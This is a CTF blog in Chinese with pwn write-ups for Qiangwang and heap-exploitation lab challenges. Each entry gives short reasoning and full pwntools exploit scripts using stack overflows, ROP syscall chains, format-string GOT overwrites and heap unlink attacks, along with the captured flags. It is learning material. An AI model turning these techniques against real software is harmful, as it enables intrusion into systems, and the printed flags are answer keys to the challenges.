    fp._codecvt = stderr
    fp.vtable = __GI__IO_wfile_overflow
    fp.chain = leave_ret

    raw_input("DEBUG")
    target.send(bytes(fp))

    target.interactive()


if __name__ == "__main__":
    main()

后记

紧赶慢赶从月垫底杀到第三，完结撒花。一共耗时……15 天 xD

其实可以控制在七天以内解决，只是因为最近实在太懒了，基本上前期都是一天只做一道题，不管是难题还是简单题……

接下来应该还有最后一个比较综合的 FSOP 利用章节，打算一周解决，然后去稍稍学点 kernel，专攻 IoT，打比赛，准备面试。呀，2 AM 了。就酱，晚安世界～

Write-ups: 第八届「强网」拟态防御国际精英挑战赛-线上预选赛

Sat, 25 Oct 2025 00:00:00 GMT

babystack

Information

Category: Pwn
Points: 500

Description

拿到属于你的 shell 吧<br/> Get your own shell

Write-up

？

Exploit

#!/usr/bin/env python3

from pwn import (
    ELF,
    args,
    context,
    flat,
    process,
    raw_input,
    remote,
)


FILE = "./babystack"
HOST, PORT = "pwn-10ba42cde6.challenge.xctf.org.cn", 9999

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT, ssl=True)


def main():
    launch()

    payload = flat(
        b"A" * 24,
    )
    target.sendafter(b"flag1:", payload)
    payload = flat(
        b"B" * 0xF8,
        0x1337ABC,
    )
    raw_input("DEBUG")
    target.sendlineafter(b"flag2:", payload)

    target.interactive()


if __name__ == "__main__":
    main()

Flag

:spoiler[flag{W528uZdUsvWbiWxqon5YLvZa8x6uo8IP}]

stack

Information

Category: Pwn
Points: 500

Description

我不需要 libc，我猜你也可以不需要<br/> I don't need libc, and I guess you don't need it either

Write-up

~~为了「讨好」，哦不，是「迎合」，迎合 description，我用 ld……~~

printf 使用 rbp 定位，可以用来泄漏栈地址和其它任意地址。

; Attributes: bp-based frame

; int sub_401354()
sub_401354 proc near

s= byte ptr -10h

; __unwind {
endbr64
push    rbp
mov     rbp, rsp
sub     rsp, 10h
lea     rax, [rbp+s]
mov     edx, 10h        ; n
mov     esi, 0          ; c
mov     rdi, rax        ; s
call    _memset
lea     rax, aCouldYouTellMe ; "Could you tell me your name?"
mov     rdi, rax        ; s
call    _puts
lea     rax, [rbp+s]
mov     edx, 18h        ; nbytes
mov     rsi, rax        ; buf
mov     edi, 0          ; fd
call    _read
lea     rax, [rbp+s]
mov     rsi, rax
lea     rax, format     ; "Hello, %s!\n"
mov     rdi, rax        ; format
mov     eax, 0
call    _printf
nop
leave
retn
; } // starts at 401354
sub_401354 endp

Exploit

#!/usr/bin/env python3

from pwn import (
    ELF,
    args,
    context,
    flat,
    process,
    raw_input,
    remote,
)


FILE = "./pwn_patched"
HOST, PORT = "pwn-2229eb847f.challenge.xctf.org.cn", 9999

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT, ssl=True)


def main():
    launch()

    # raw_input("DEBUG")
    target.sendafter(b"name?", b"A" * 0x10)
    target.recvuntil(b"A" * 0x10)
    stack = int.from_bytes(target.recv(0x6), "little")
    ld = stack + 0xC0
    ret = stack + 0x20
    target.success(f"stack: {hex(stack)}")

    payload = flat(
        b"A" * 0x60,
        ret + 0x60,
        0x4013D4,  # read
    )
    # raw_input("DEBUG")
    target.sendafter(b"Any thing else?", payload)

    payload = flat(
        0x401413,  # main
        b"A" * 0x58,
        ld + 0x10,
        0x40139B,  # printf
    )
    target.sendline(payload)
    target.recvuntil(b"Hello, ")
    leaked_ld = int.from_bytes(target.recv(0x6), "little") - 0x3B2E0
    target.success(f"libc: {hex(leaked_ld)}")

    target.sendlineafter(b"name?", b"")

    flag = stack - 0xA0
    payload = flat(
        b"./flag\x00\x00",
        b"A" * 0x60,
        # openat
        leaked_ld + 0x25E6B,  # pop rdi; ret
        -100,
        leaked_ld + 0x54DA,  # pop rsi; ret
        flag,
        leaked_ld + 0x20322,  # pop rax; pop rdx; pop rbx; ret
        0x101,
        0,
        0,
        leaked_ld + 0x16629,  # syscall; ret
        # read
        leaked_ld + 0x25E6B,  # pop rdi; ret
        0x3,
        leaked_ld + 0x54DA,  # pop rsi; ret
        elf.bss() + 0x500,
        leaked_ld + 0x20322,  # pop rax; pop rdx; pop rbx; ret
        0,
        0x1337,
        0,
        leaked_ld + 0x16629,  # syscall; ret
        # write
        leaked_ld + 0x25E6B,  # pop rdi; ret
        0x1,
        leaked_ld + 0x54DA,  # pop rsi; ret
        elf.bss() + 0x500,
        leaked_ld + 0x20322,  # pop rax; pop rdx; pop rbx; ret
        1,
        0x1337,
        0,
        leaked_ld + 0x16629,  # syscall; ret
    )
    raw_input("DEBUG")
    target.sendafter(b"Any thing else?", payload)

    target.interactive()


if __name__ == "__main__":
    main()

Flag

:spoiler[flag{nfRlSH0ll0o4j4kd05IA6NJWtO8DYYSk}]

Write-ups: 第九届「强网杯」全国网络安全挑战赛

Sun, 19 Oct 2025 00:00:00 GMT

flag-market

Information

Category: Pwn
Points: 500

Description

flag 市场，童叟无欺

Write-up

第一次打国赛，没想到能遇上一道我能做的题……~呜呜呜太感动了（~

逆向出来的代码就这么点：

__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
  int i; // [rsp+Ch] [rbp-84h]
  int fd_log; // [rsp+14h] [rbp-7Ch]
  FILE *flag_stream; // [rsp+18h] [rbp-78h]
  char flag_filepath[9]; // [rsp+27h] [rbp-69h] BYREF
  char buf[16]; // [rsp+30h] [rbp-60h] BYREF
  char flag_buf[72]; // [rsp+40h] [rbp-50h] BYREF
  unsigned __int64 v10; // [rsp+88h] [rbp-8h]

  v10 = __readfsqword(0x28u);
  init();
  strcpy(flag_filepath, "/flag");
  flag_stream = fopen(flag_filepath, "r");
  is_flag_open = 1;
  while ( 1 )
  {
    while ( 1 )
    {
      puts("welcome to flag market!\ngive me money to buy my flag,\nchoice: \n1.take my money\n2.exit");
      memset(buf, 0, sizeof(buf));
      read(0, buf, 0x10u);
      if ( atoi(buf) != 1 )
        exit(0);
      puts("how much you want to pay?");
      memset(buf, 0, sizeof(buf));
      read(0, buf, 0x10u);
      if ( atoi(buf) == 0xFF )
        break;
      printf("You are so parsimonious!!!");
      if ( is_flag_open )
      {
        fclose(flag_stream);
        is_flag_open = 0;
      }
    }
    puts(aThankYouForPay);                      // "Thank you for paying,let me give you flag: "
    if ( !is_flag_open || !fgets(flag_buf, 64, flag_stream) )
      break;
    for ( i = 0; ; ++i )
    {
      if ( i > 64 )
      {
        puts("\nThank you for your patronage!");
        return 0;
      }
      if ( flag_buf[i] == '{' )
        break;
      putchar(flag_buf[i]);
      sleep(1u);
    }
    memset(flag_buf, 0, 0x40u);
    puts(a1m31mError0mSo);                      // "\n\x1B[1m\x1B[31m==========error!!!========== \x1B[0m \nSorry, but maybe something wrong... \nyou can report it in user.log"
    puts("opened user.log, please report:");
    memset(
      log_file_open_flags_input,                // "everything is ok~"
      0,
      0x100u);
    __isoc99_scanf("%s", log_file_open_flags_input);// "everything is ok~"
    getchar();
    fd_log = open("user.log", log_file_open_flags_input);// "everything is ok~"
    write(
      fd_log,
      log_file_open_flags_input,                // "everything is ok~"
      0x100u);
    puts(aOkNowYouCanExi);                      // "OK,now you can exit or try again."
  }
  puts("something is wrong");
  return 0;
}

初看不难发现，scanf 的 %s 是一个很明显的无限长度输入，后面的 open / write 则似乎是障眼法，因为无论哪个成立了都会导致另一个失败，并且调试发现 scanf 内部会破坏 RSI，所以 open 永远不会成功，且由于程序没有对它们的返回值做检查，所以会忽略错误继续执行，而不是 abort 。那难道就没有什么别的办法了吗？题目既然可以出出来，就一定能做……

其实细看的话可以发现，上面有个 printf 存在一个不怎么显眼的格式化字符串漏洞。由于 scanf 可以向 log_file_open_flags_input 写入无限长度数据覆盖 format 为自定义格式化字符串，因此当我们输入的金额不等于 0xff 的时候就可以触发格式化字符串漏洞了。

至于如何实现无限次格式化字符串，我这里是改了 exit 的 got entry 为 main 函数地址。

.data:00000000004040A0 ; ===========================================================================
.data:00000000004040A0
.data:00000000004040A0 ; Segment type: Pure data
.data:00000000004040A0 ; Segment permissions: Read/Write
.data:00000000004040A0 _data           segment align_32 public 'DATA' use64
.data:00000000004040A0                 assume cs:_data
.data:00000000004040A0                 ;org 4040A0h
.data:00000000004040A0                 align 40h
.data:00000000004040C0 ; int log_file_open_flags_input
.data:00000000004040C0 log_file_open_flags_input db 'everything is ok~',0
.data:00000000004040C0                                         ; DATA XREF: main+245↑o
.data:00000000004040C0                                         ; main+254↑o ...
.data:00000000004040D2                 db    0
.data:00000000004040D3                 db    0
.data:00000000004040D4                 db    0
.data:00000000004040D5                 db    0
.data:00000000004040D6                 db    0
.data:00000000004040D7                 db    0
.data:00000000004040D8                 db    0
.data:00000000004040D9                 db    0
.data:00000000004040DA                 db    0
.data:00000000004040DB                 db    0
.data:00000000004040DC                 db    0
.data:00000000004040DD                 db    0
.data:00000000004040DE                 db    0
.data:00000000004040DF                 db    0
.data:00000000004040E0                 db    0
.data:00000000004040E1                 db    0
.data:00000000004040E2                 db    0
.data:00000000004040E3                 db    0
.data:00000000004040E4                 db    0
.data:00000000004040E5                 db    0
.data:00000000004040E6                 db    0
.data:00000000004040E7                 db    0
.data:00000000004040E8                 db    0
.data:00000000004040E9                 db    0
.data:00000000004040EA                 db    0
.data:00000000004040EB                 db    0
.data:00000000004040EC                 db    0
.data:00000000004040ED                 db    0
.data:00000000004040EE                 db    0
.data:00000000004040EF                 db    0
.data:00000000004040F0                 db    0
.data:00000000004040F1                 db    0
.data:00000000004040F2                 db    0
.data:00000000004040F3                 db    0
.data:00000000004040F4                 db    0
.data:00000000004040F5                 db    0
.data:00000000004040F6                 db    0
.data:00000000004040F7                 db    0
.data:00000000004040F8                 db    0
.data:00000000004040F9                 db    0
.data:00000000004040FA                 db    0
.data:00000000004040FB                 db    0
.data:00000000004040FC                 db    0
.data:00000000004040FD                 db    0
.data:00000000004040FE                 db    0
.data:00000000004040FF                 db    0
.data:0000000000404100                 db    0
.data:0000000000404101                 db    0
.data:0000000000404102                 db    0
.data:0000000000404103                 db    0
.data:0000000000404104                 db    0
.data:0000000000404105                 db    0
.data:0000000000404106                 db    0
.data:0000000000404107                 db    0
.data:0000000000404108                 db    0
.data:0000000000404109                 db    0
.data:000000000040410A                 db    0
.data:000000000040410B                 db    0
.data:000000000040410C                 db    0
.data:000000000040410D                 db    0
.data:000000000040410E                 db    0
.data:000000000040410F                 db    0
.data:0000000000404110                 db    0
.data:0000000000404111                 db    0
.data:0000000000404112                 db    0
.data:0000000000404113                 db    0
.data:0000000000404114                 db    0
.data:0000000000404115                 db    0
.data:0000000000404116                 db    0
.data:0000000000404117                 db    0
.data:0000000000404118                 db    0
.data:0000000000404119                 db    0
.data:000000000040411A                 db    0
.data:000000000040411B                 db    0
.data:000000000040411C                 db    0
.data:000000000040411D                 db    0
.data:000000000040411E                 db    0
.data:000000000040411F                 db    0
.data:0000000000404120                 db    0
.data:0000000000404121                 db    0
.data:0000000000404122                 db    0
.data:0000000000404123                 db    0
.data:0000000000404124                 db    0
.data:0000000000404125                 db    0
.data:0000000000404126                 db    0
.data:0000000000404127                 db    0
.data:0000000000404128                 db    0
.data:0000000000404129                 db    0
.data:000000000040412A                 db    0
.data:000000000040412B                 db    0
.data:000000000040412C                 db    0
.data:000000000040412D                 db    0
.data:000000000040412E                 db    0
.data:000000000040412F                 db    0
.data:0000000000404130                 db    0
.data:0000000000404131                 db    0
.data:0000000000404132                 db    0
.data:0000000000404133                 db    0
.data:0000000000404134                 db    0
.data:0000000000404135                 db    0
.data:0000000000404136                 db    0
.data:0000000000404137                 db    0
.data:0000000000404138                 db    0
.data:0000000000404139                 db    0
.data:000000000040413A                 db    0
.data:000000000040413B                 db    0
.data:000000000040413C                 db    0
.data:000000000040413D                 db    0
.data:000000000040413E                 db    0
.data:000000000040413F                 db    0
.data:0000000000404140                 db    0
.data:0000000000404141                 db    0
.data:0000000000404142                 db    0
.data:0000000000404143                 db    0
.data:0000000000404144                 db    0
.data:0000000000404145                 db    0
.data:0000000000404146                 db    0
.data:0000000000404147                 db    0
.data:0000000000404148                 db    0
.data:0000000000404149                 db    0
.data:000000000040414A                 db    0
.data:000000000040414B                 db    0
.data:000000000040414C                 db    0
.data:000000000040414D                 db    0
.data:000000000040414E                 db    0
.data:000000000040414F                 db    0
.data:0000000000404150                 db    0
.data:0000000000404151                 db    0
.data:0000000000404152                 db    0
.data:0000000000404153                 db    0
.data:0000000000404154                 db    0
.data:0000000000404155                 db    0
.data:0000000000404156                 db    0
.data:0000000000404157                 db    0
.data:0000000000404158                 db    0
.data:0000000000404159                 db    0
.data:000000000040415A                 db    0
.data:000000000040415B                 db    0
.data:000000000040415C                 db    0
.data:000000000040415D                 db    0
.data:000000000040415E                 db    0
.data:000000000040415F                 db    0
.data:0000000000404160                 db    0
.data:0000000000404161                 db    0
.data:0000000000404162                 db    0
.data:0000000000404163                 db    0
.data:0000000000404164                 db    0
.data:0000000000404165                 db    0
.data:0000000000404166                 db    0
.data:0000000000404167                 db    0
.data:0000000000404168                 db    0
.data:0000000000404169                 db    0
.data:000000000040416A                 db    0
.data:000000000040416B                 db    0
.data:000000000040416C                 db    0
.data:000000000040416D                 db    0
.data:000000000040416E                 db    0
.data:000000000040416F                 db    0
.data:0000000000404170                 db    0
.data:0000000000404171                 db    0
.data:0000000000404172                 db    0
.data:0000000000404173                 db    0
.data:0000000000404174                 db    0
.data:0000000000404175                 db    0
.data:0000000000404176                 db    0
.data:0000000000404177                 db    0
.data:0000000000404178                 db    0
.data:0000000000404179                 db    0
.data:000000000040417A                 db    0
.data:000000000040417B                 db    0
.data:000000000040417C                 db    0
.data:000000000040417D                 db    0
.data:000000000040417E                 db    0
.data:000000000040417F                 db    0
.data:0000000000404180                 db    0
.data:0000000000404181                 db    0
.data:0000000000404182                 db    0
.data:0000000000404183                 db    0
.data:0000000000404184                 db    0
.data:0000000000404185                 db    0
.data:0000000000404186                 db    0
.data:0000000000404187                 db    0
.data:0000000000404188                 db    0
.data:0000000000404189                 db    0
.data:000000000040418A                 db    0
.data:000000000040418B                 db    0
.data:000000000040418C                 db    0
.data:000000000040418D                 db    0
.data:000000000040418E                 db    0
.data:000000000040418F                 db    0
.data:0000000000404190                 db    0
.data:0000000000404191                 db    0
.data:0000000000404192                 db    0
.data:0000000000404193                 db    0
.data:0000000000404194                 db    0
.data:0000000000404195                 db    0
.data:0000000000404196                 db    0
.data:0000000000404197                 db    0
.data:0000000000404198                 db    0
.data:0000000000404199                 db    0
.data:000000000040419A                 db    0
.data:000000000040419B                 db    0
.data:000000000040419C                 db    0
.data:000000000040419D                 db    0
.data:000000000040419E                 db    0
.data:000000000040419F                 db    0
.data:00000000004041A0                 db    0
.data:00000000004041A1                 db    0
.data:00000000004041A2                 db    0
.data:00000000004041A3                 db    0
.data:00000000004041A4                 db    0
.data:00000000004041A5                 db    0
.data:00000000004041A6                 db    0
.data:00000000004041A7                 db    0
.data:00000000004041A8                 db    0
.data:00000000004041A9                 db    0
.data:00000000004041AA                 db    0
.data:00000000004041AB                 db    0
.data:00000000004041AC                 db    0
.data:00000000004041AD                 db    0
.data:00000000004041AE                 db    0
.data:00000000004041AF                 db    0
.data:00000000004041B0                 db    0
.data:00000000004041B1                 db    0
.data:00000000004041B2                 db    0
.data:00000000004041B3                 db    0
.data:00000000004041B4                 db    0
.data:00000000004041B5                 db    0
.data:00000000004041B6                 db    0
.data:00000000004041B7                 db    0
.data:00000000004041B8                 db    0
.data:00000000004041B9                 db    0
.data:00000000004041BA                 db    0
.data:00000000004041BB                 db    0
.data:00000000004041BC                 db    0
.data:00000000004041BD                 db    0
.data:00000000004041BE                 db    0
.data:00000000004041BF                 db    0
.data:00000000004041C0 ; char format[]
.data:00000000004041C0 format          db 'You are so parsimonious!!!',0
.data:00000000004041C0                                         ; DATA XREF: main+112↑o
.data:00000000004041DB                 align 20h
.data:00000000004041E0 ; char aThankYouForPay[]
.data:00000000004041E0 aThankYouForPay db 'Thank you for paying,let me give you flag: ',0
.data:00000000004041E0                                         ; DATA XREF: main:loc_4014EA↑o
.data:000000000040420C                 align 20h
.data:0000000000404220 ; char a1m31mError0mSo[]
.data:0000000000404220 a1m31mError0mSo db 0Ah                  ; DATA XREF: main+21D↑o
.data:0000000000404221                 db 1Bh,'[1m',1Bh,'[31m==========error!!!========== ',1Bh,'[0m ',0Ah
.data:000000000040424D                 db 'Sorry, but maybe something wrong... ',0Ah
.data:0000000000404272                 db 'you can report it in user.log',0
.data:0000000000404290                 align 20h
.data:00000000004042A0 ; char aOkNowYouCanExi[]
.data:00000000004042A0 aOkNowYouCanExi db 'OK,now you can exit or try again.',0
.data:00000000004042A0                                         ; DATA XREF: main+2A7↑o
.data:00000000004042A0 _data           ends
.data:00000000004042A0

下面我写了两个 exp，第一个的思路是改 memset 为 ret 让它不要清空 flag，然后用 %p 输出，但是发现只有本地能通，远程不知道为啥不行，然后换了一种打法，fopen 会返回一个 FILE 结构体，之后 fgets 会在里面放一些地址，这其中就有 flag 的 stream buf 起始地址，我们把 fopen 返回的地址泄漏，算一下它和 flag stream buf 的偏移，发现此值固定，得到 flag 地址后写到栈上，用 %s 输出就好了。

Exploit I

#!/usr/bin/env python3

from pwn import (
    ELF,
    args,
    context,
    flat,
    process,
    raw_input,
    remote,
)


FILE = "./patched"
HOST, PORT = "8.147.135.220", 24630

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary


def lehex_to_ascii(s: str) -> str:
    parts = s.strip().split("-")
    out = bytearray()
    for p in parts:
        p = p.strip()
        if not p:
            continue
        h = p[2:] if p.startswith(("0x", "0X")) else p
        h = h.strip()
        if len(h) % 2:  # pad odd-length hex
            h = "0" + h
        out += bytes.fromhex(h)[::-1]
    return out.rstrip(b"\x00").decode("ascii", errors="replace")


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)


def main():
    launch()

    target.sendlineafter(b"2.exit", b"1")
    target.sendlineafter(b"pay?\x0a", b"255")

    payload = flat(
        b"A" * 0x100,
        b"%5019c%12$hn",
    )
    target.sendlineafter(b"report:", payload)

    target.sendlineafter(b"2.exit", b"1")
    # raw_input("DEBUG")
    target.sendlineafter(b"pay?\x0a", flat(elf.got["exit"]))

    # raw_input("DEBUG")
    target.sendlineafter(b"2.exit", b"2")

    target.sendlineafter(b"2.exit", b"1")
    target.sendlineafter(b"pay?\x0a", b"255")

    payload = flat(
        b"A" * 0x100,
        b"%173c%12$hhn",
    )
    target.sendlineafter(b"report:", payload)

    target.sendlineafter(b"2.exit", b"1")
    # raw_input("DEBUG")
    target.sendlineafter(b"pay?\x0a", flat(elf.got["memset"]))

    # raw_input("DEBUG")
    target.sendlineafter(b"2.exit", b"2")
    target.sendlineafter(b"2.exit", b"1")
    target.sendlineafter(b"pay?\x0a", b"255")

    payload = flat(
        b"A" * 0x100,
        b"%14$p-%15$p-%16$p-%17$p-%18$p-%19$p",
    )
    target.sendlineafter(b"report:", payload)
    target.sendlineafter(b"2.exit", b"1")
    target.sendlineafter(b"pay?\x0a", b"0")

    flag = target.recvuntil(b"welcome")[:-7]
    target.success(lehex_to_ascii(flag.decode()))

    target.interactive()


if __name__ == "__main__":
    main()

Exploit II

#!/usr/bin/env python3

from pwn import (
    ELF,
    args,
    context,
    flat,
    process,
    raw_input,
    remote,
)


FILE = "./patched"
HOST, PORT = "8.147.135.220", 24630

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)


def main():
    launch()

    target.sendlineafter(b"2.exit", b"1")
    target.sendlineafter(b"pay?\x0a", b"255")

    payload = flat(
        b"A" * 0x100,
        b"%9$p%5009c%12$hn",
    )
    target.sendlineafter(b"report:", payload)

    target.sendlineafter(b"2.exit", b"1")
    # raw_input("DEBUG")
    target.sendlineafter(b"pay?\x0a", flat(elf.got["exit"]))

    flag = int(target.recv(0xA), 16) + 0x1E0
    target.success(f"flag: {hex(flag)}")

    # raw_input("DEBUG")
    target.sendlineafter(b"2.exit", b"2")

    raw_input("DEBUG")
    target.sendlineafter(b"2.exit", b"1")
    target.sendlineafter(b"pay?\x0a", b"255")

    payload = flat(
        b"A" * 0x100,
        b"%12$s",
    )
    target.sendlineafter(b"report:", payload)
    target.sendlineafter(b"exit", b"1")
    target.sendlineafter(b"pay?\x0a", flat(flag))

    target.interactive()


if __name__ == "__main__":
    main()

Flag

:spoiler[flag{0ec285cb-c1b3-49ff-820b-8075a639bc1e}]

Write-ups: Software Exploitation (Dynamic Allocator Exploitation) series (Completed)

Fri, 17 Oct 2025 00:00:00 GMT

前言

冲冲冲，尽快拿下这一章然后学 FSOP，同时空下来学点 IoT，提前进军 realworld 。

Level 1.0

Information

Category: Pwn

Description

Leverage consolidation to obtain the flag.

Write-up

先填满 tcache，然后再申请同样大小就进入 fastbin 了，接着释放，让它可再次被分配，由于 malloc 超出 smallbin 范围的 chunk 会先触发 malloc_consolidate，强制合并所有 fastbin 到 top chunk，所以 read_flag 可以返回我们 fastbin 中那个 free 的地址，而由于 free 的时候并没有清除结构体中保存的指针，所以我们可以通过 puts UAF 泄漏其值。

Exploit

#!/usr/bin/env python3

from pwn import (
    ELF,
    args,
    context,
    flat,
    process,
    raw_input,
    remote,
)

FILE = "/challenge/toddlerheap_level1.0"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary
libc = ELF("/challenge/lib/libc.so.6")


def malloc(idx, size):
    target.sendlineafter(b": ", b"malloc")
    target.sendlineafter(b"Index: ", str(idx).encode())
    target.sendlineafter(b"Size: ", str(size).encode())


def free(idx):
    target.sendlineafter(b": ", b"free")
    target.sendlineafter(b"Index: ", str(idx).encode())


def puts(idx):
    target.sendlineafter(b": ", b"puts")
    target.sendlineafter(b"Index: ", str(idx))


def read_flag():
    target.sendlineafter(b": ", b"read_flag")


def quit():
    target.sendlineafter(b": ", b"quit")


def mangle(pos, ptr, shifted=1):
    if shifted:
        return pos ^ ptr
    return (pos >> 12) ^ ptr


def demangle(pos, ptr, shifted=1):
    if shifted:
        return mangle(pos, ptr)
    return mangle(pos, ptr, 0)


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)


def main():
    launch()

    for i in range(7):
        malloc(i, 0)

    malloc(7, 0)

    for i in range(7):
        free(i)

    raw_input("DEBUG")
    free(7)
    read_flag()
    puts(7)
    quit()

    target.interactive()


if __name__ == "__main__":
    main()

Level 2.0

Information

Category: Pwn

Description

Leverage consolidation to obtain the flag.

Write-up

    if ( strcmp(s1, "read_flag") )
      break;
    for ( i = 0; i <= 1; ++i )
    {
      printf("[*] flag_buffer = malloc(%d)\n", 1434);
      size_4 = malloc(0x59Au);
      printf("[*] flag_buffer = %p\n", size_4);
    }
    fd = open("/flag", 0);
    read(fd, size_4, 0x80u);
    puts("[*] read the flag!");
  }

这次就是 read_flag 中会执行两次 malloc，flag 被写到最后一次 malloc 返回的地址中。

那还不简单，丢两个与 malloc 申请的大小一样的 chunk 到 unsorted bin 中，这样切蛋糕切出来第二块的地址正好就是 flag 的 chunk 地址了。

Exploit

#!/usr/bin/env python3

from pwn import (
    ELF,
    args,
    context,
    flat,
    process,
    raw_input,
    remote,
)


FILE = "/challenge/toddlerheap_level2.0"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary


def malloc(idx, size):
    target.sendlineafter(b": ", b"malloc")
    target.sendlineafter(b"Index: ", str(idx).encode())
    target.sendlineafter(b"Size: ", str(size).encode())


def calloc(idx, size):
    target.sendlineafter(b": ", b"calloc")
    target.sendlineafter(b"Index: ", str(idx).encode())
    target.sendlineafter(b"Size: ", str(size).encode())


def free(idx):
    target.sendlineafter(b": ", b"free")
    target.sendlineafter(b"Index: ", str(idx).encode())


def puts(idx):
    target.sendlineafter(b": ", b"puts")
    target.sendlineafter(b"Index: ", str(idx))


def read_flag():
    target.sendlineafter(b": ", b"read_flag")


def quit():
    target.sendlineafter(b": ", b"quit")


def mangle(pos, ptr, shifted=1):
    if shifted:
        return pos ^ ptr
    return (pos >> 12) ^ ptr


def demangle(pos, ptr, shifted=1):
    if shifted:
        return mangle(pos, ptr)
    return mangle(pos, ptr, 0)


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)


def main():
    launch()

    for i in range(7):
        malloc(i, 0)

    for i in range(7):
        free(i)

    calloc(0, 0x59A)
    calloc(1, 0x59A)
    calloc(2, 0)
    free(1)
    free(0)
    raw_input("DEBUG")
    read_flag()
    puts(1)
    quit()

    target.interactive()


if __name__ == "__main__":
    main()

Level 3.0

Information

Category: Pwn

Description

Leverage consolidation to obtain the flag.

Write-up

和上题类似，区别在于这次我们可以 malloc 的大小被限制为必须 > 0x41F，而 read_flag 内部使用的 malloc 大小为 0x390，导致无法精确分配到我们想要的 chunk，咋办？

回忆一下 malloc 和相邻 chunk consolidation 的机制，我们注意到 malloc 的查找顺序为 tcachebins -> fastbins -> smallbins -> unsorted bins -> ... 由于这里我们只能请求 > 0x41F 大小的 chunk，所以可以直接排除 tcachebins、fastbins 和 smallbins 的可能性，那么 malloc 会直接查 unsorted bins，有合适的就直接返回，如果远大于请求大小就切割然后归类，不够就去下一个 bin 中找……

那我们只要设计一个 [free chunk with controled idx][guard][free chunk with controled idx][guard]... 这样的堆布局，重复 11 组即可。

Exploit

#!/usr/bin/env python3

from pwn import (
    ELF,
    args,
    context,
    flat,
    process,
    raw_input,
    remote,
)


FILE = "/challenge/toddlerheap_level3.0"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary


def malloc(idx, size):
    target.sendlineafter(b": ", b"malloc")
    target.sendlineafter(b"Index: ", str(idx).encode())
    target.sendlineafter(b"Size: ", str(size).encode())


def free(idx):
    target.sendlineafter(b": ", b"free")
    target.sendlineafter(b"Index: ", str(idx).encode())


def puts(idx):
    target.sendlineafter(b": ", b"puts")
    target.sendlineafter(b"Index: ", str(idx))


def read_flag():
    target.sendlineafter(b": ", b"read_flag")


def quit():
    target.sendlineafter(b": ", b"quit")


def mangle(pos, ptr, shifted=1):
    if shifted:
        return pos ^ ptr
    return (pos >> 12) ^ ptr


def demangle(pos, ptr, shifted=1):
    if shifted:
        return mangle(pos, ptr)
    return mangle(pos, ptr, 0)


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)


def main():
    launch()

    for i in range(12):
        # raw_input("DEBUG")
        malloc(i, 0x420)
        # raw_input("DEBUG")
        malloc(15, 0x420)

    for i in range(12):
        # raw_input("DEBUG")
        free(i)

    read_flag()
    puts(11)
    quit()

    target.interactive()


if __name__ == "__main__":
    main()

Level 4.0

Information

Category: Pwn

Description

Perform an advanced heap exploit to obtain the flag.

Write-up

这题就是打个高版本 unlink，看了下，发现 2.41 的打法也是一样的，那我盲猜 2.42 应该也没变。

不会 unlink 的可以看我写的 Doubly Linked, Doubly Doomed 。

Exploit

#!/usr/bin/env python3

from pwn import (
    ELF,
    args,
    context,
    flat,
    process,
    raw_input,
    remote,
)


FILE = "./toddlerheap_level4.0_patched"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary


def malloc(idx, size):
    target.sendlineafter(b": ", b"malloc")
    target.sendlineafter(b"Index: ", str(idx).encode())
    target.sendlineafter(b"Size: ", str(size).encode())


def free(idx):
    target.sendlineafter(b": ", b"free")
    target.sendlineafter(b"Index: ", str(idx).encode())


def puts(idx):
    target.sendlineafter(b": ", b"puts")
    target.sendlineafter(b"Index: ", str(idx).encode())


def safe_read(idx, data):
    target.sendlineafter(b": ", b"safe_read")
    target.sendlineafter(b"Index: ", str(idx).encode())
    target.sendline(data)


def send_flag():
    target.sendlineafter(b": ", b"send_flag")


def quit():
    target.sendlineafter(b": ", b"quit")


def mangle(pos, ptr, shifted=1):
    if shifted:
        return pos ^ ptr
    return (pos >> 12) ^ ptr


def demangle(pos, ptr, shifted=1):
    if shifted:
        return mangle(pos, ptr)
    return mangle(pos, ptr, 0)


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)


def main():
    launch()

    malloc(0, 0xBB8 * 3)
    free(0)
    malloc(15, 0xBB8)  # guard

    malloc(1, 0xBB8)
    malloc(2, 0xBB8)

    payload = flat(
        b"A" * 0xBB0,
        0,
        0xBC1,
        0,  # prev_size
        (0xBC0 - 0x10) | 0x1,  # chunk_size
        0x404130,  # fd
        0x404138,  # bk
        0,  # fd_nextsize
        0,  # bk_nextsize
        b"A" * 0xB80,
        0xBC0 - 0x10,  # prev_size
        0xBC1 & ~0x1,  # chunk_size
    )
    raw_input("DEBUG")
    safe_read(0, payload)
    free(2)

    payload = flat(
        b"A" * 0x98,
        0x1,
    )
    raw_input("DEBUG")
    safe_read(1, payload)
    send_flag()
    quit()

    target.interactive()


if __name__ == "__main__":
    main()

Level 5.0

Information

Category: Pwn

Description

Perform an advanced heap exploit to obtain the flag.

Write-up

也是 unlink，unlink 以后我们就能控制 alloc_struct 了，由于这里面保存的都是 malloc 的返回值，所以我们还可以利用它来泄漏堆地址，定位 flag 的位置，最后，只需要想办法让 malloc 返回 flag 的地址即可，我通过 overlapping chunks 实现的这一点。

Exploit

#!/usr/bin/env python3

from pwn import (
    ELF,
    args,
    context,
    flat,
    process,
    raw_input,
    remote,
)


FILE = "/challenge/toddlerheap_level5.0"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary


def malloc(idx, size):
    target.sendlineafter(b": ", b"malloc")
